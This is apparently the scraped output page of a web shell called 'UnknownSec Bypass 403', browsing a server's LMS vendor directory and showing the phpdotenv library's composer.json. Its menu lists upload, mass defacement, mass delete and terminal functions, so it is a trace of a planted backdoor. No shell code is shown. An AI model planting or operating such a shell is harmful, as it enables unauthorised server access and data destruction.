UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_f03a82298366
/
vendor
/
vlucas
/
phpdotenv
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
composer.json
{ "name": "vlucas/phpdotenv", "type": "library", "description": "Loads environment variables from `.env` to `getenv()`, `$_ENV` and `$_SERVER` automagically.", "keywords": ["env", "dotenv", "environment"], "homepage": "http://github.com/vlucas/phpdotenv", "license" : "BSD", "authors" : [ { "name": "Vance Lucas", "email": "vance@vancelucas.com", "homepage": "http://www.vancelucas.com" } ], "require": { "php": ">=5.3.2" }, "require-dev": { "phpunit/phpunit": "~4.0" }, "autoload": { "psr-0": { "Dotenv": "src/" } } }
Copyright © 2026 - UnknownSec